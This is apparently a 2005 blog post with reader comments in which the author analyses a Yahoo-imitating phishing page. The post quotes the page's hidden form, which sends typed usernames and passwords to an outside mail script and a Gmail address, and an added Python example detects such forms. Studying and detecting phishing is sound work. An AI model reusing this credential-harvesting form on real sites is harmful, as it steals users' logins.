Phishing : bisxybiotch

October 24, 2005 - 11:03am
Submitted by Kedar Sovani on October 24, 2005 - 11:03am.

Recently, I have been getting a lot of messages from people in my Yahoo list, which read something like this:


http://www.geocities.com/bisxybiotch/

Strange, I thought. The geocities homepage shows up similar to the Yahoo Photos page, prompting me for a loginid/passwd. I thought something was not right. On downloading the page and reading through the HTML source, I could see something like this:

<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="bisxybiotch@gmail.com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
<INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://photos.yahoo.com/ph//my_photos">

On converting the integer values to ASCII characters, it looked something like this:

<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">

I started Ethereal to check what data was being transmitted. I used a fake userid and password, and I could see that the credentials were being transmitted to the mailto.cgi form on that website. I think it mails out the credentials to that Gmail id, and once it has a valid password, it would get a list of my contacts and send that malicious message to all of them as well...

An example of "Semantic Attacks".
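
The manual check described in the post, as an added Python example (not part of the original post): it decodes integer-encoded markup and flags a form that posts off-site, carries a hidden mail recipient, and redirects to the real site afterwards. It assumes the integers were decimal character references (&#NN;), which the post does not state; FormAudit, audit, charrefs, the finding names and the served_from/brand_domain parameters are hypothetical.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormAudit(HTMLParser):
    """Collects each form's ACTION and its hidden inputs."""
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # the parser lowercases tag and attribute names
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "hidden": []})
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "hidden":
            self.forms[-1]["hidden"].append((a.get("name") or "", a.get("value") or ""))

def in_domain(host, domain):
    return host == domain or host.endswith("." + domain)

def audit(page_source, served_from, brand_domain):
    """Return (finding, detail) pairs for forms on a page imitating brand_domain."""
    parser = FormAudit()
    # Decode &#NN; references first, so markup encoded wholesale is parsed too.
    parser.feed(html.unescape(page_source))
    findings = []
    for form in parser.forms:
        # A relative ACTION posts back to the host that served the page.
        host = urlparse(form["action"]).hostname or served_from
        if not in_domain(host, brand_domain):
            findings.append(("offsite_action", host))
        for name, value in form["hidden"]:
            target = urlparse(value).hostname
            if "@" in value and not target:
                findings.append(("mail_address", f"{name}={value}"))
            elif target and in_domain(target, brand_domain):
                findings.append(("brand_redirect", f"{name}={value}"))
    return findings

def charrefs(s):
    # Only used to build the constructed sample below.
    return "".join(f"&#{ord(c)};" for c in s)

# Constructed sample: the tags quoted in the post, with ACTION re-encoded as integers.
SAMPLE = (
    f'<FORM METHOD="POST" ACTION="{charrefs("http://www2.fiberbit.net/form/mailto.cgi")}" '
    'ENCTYPE="x-www-form-urlencoded">'
    '<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">'
    '<INPUT TYPE="hidden" NAME="Mail_To" VALUE="bisxybiotch@gmail.com">'
    '<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">'
    '<INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://photos.yahoo.com/ph//my_photos">'
)
```

Calling audit(SAMPLE, "www.geocities.com", "yahoo.com") returns three findings: the off-site ACTION host, the hidden Mail_To address, and the Next_Page redirect back to the genuine site.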

I should say that was good in

October 31, 2005 - 1:19am
BABS (not verified)

I should say that was good investigation! Good work!
I had also got that msg and tried checking that webpage... I don't remember if I entered the login/password.
BABS

Good Find

August 17, 2006 - 3:20am
Chirag Jog (not verified)

Good find... I am not sure whether I entered my username and password
